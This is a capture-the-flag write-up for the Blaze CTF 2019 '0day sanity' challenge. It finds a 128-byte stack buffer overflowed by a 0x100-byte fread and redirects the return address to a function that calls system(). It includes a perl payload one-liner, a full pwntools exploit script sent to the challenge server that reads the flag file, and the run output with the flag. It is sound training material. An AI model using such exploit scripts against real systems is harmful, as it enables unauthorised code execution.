Blaze CTF 2019 - 0day sanity
After I connect to the server, it requires base64-encoded data.
So I send "Bz==" to observe the behavior. The result is following.
****************
root@kali:~# nc chal.420blaze.in 42004
Give me a file (base64 encoded, followed by a newline):
Bz==
b'\x07'
thanks, time to pwn
your very own home: /tmp/tmppeijv007
analyzing your file.............
�sm0ke
time's up!
root@kali:~#
****************
[Vulnerability identification]
And there is the binary file: "chal"
Decompile the "chal" by Ghidra, I found the vuln() function.
vuln() is...
(1) Open the file which specified by the command-line of "chal".
-> fopen() is used.
(2) Read the 0x100 bytes data from the file to the buffer.
-> fread() is used.
(3) Output the data of (2) by printf().
At (2), the length of buffer is 128 bytes.
It is shorter than the read bytes. So there is the vulnerability of BoF.
I send the long-base64-encoded string to the Server.
->As I expected, Segmentation fault happened.
After 145th byte of input can be overwritten the return address of vuln().
[Exploit]
I found the dont_mind_me() function at 0x8048506 of the "chal".
It calls system() function.
In the local environment, I can get the shell by the following procedure.
************************
root@kali:~/CTF# perl -e 'print "A"x144 . "\x06\x85\x04\x08" . "\n"' > flag3.txt
root@kali:~/CTF# ./chal flag3.txt
#
************************
The script for remote enviornment is following.
Note: The place of the flag.txt is described in Notification. -> /home/pwn/flag.txt
************************
# coding:utf-8
from pwn import *
host = "chal.420blaze.in"
port = 42004
r = remote(host, port)
message = r.recvuntil("followed by a newline):")
r.recvline()
r.recvline()
print(message)
code = "A" * 144 # dummy
code += p32(0x8048506)
#code += "\n"
print(code)
print(b64e(code))
r.sendline(b64e(code))
r.sendline("\n")
r.sendline("cat /home/pwn/flag.txt\n")
r.interactive()
********************************
The result is...
********************************
root@kali:~# python solve_Blaze.py
[+] Opening connection to chal.420blaze.in on port 42004: Done
Give me a file (base64 encoded, followed by a newline):
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x0
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBBoUECA==
[*] Switching to interactive mode
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x04\x08'
thanks, time to pwn
your very own home: /tmp/tmpr_pjqy7v
analyzing your file.............
blaze{gratz_on_teh_l33t_smoked_0day}
============= NICE HIT =============
[*] Got EOF while reading in interactive
$
**************************************
Flag is: blaze{gratz_on_teh_l33t_smoked_0day}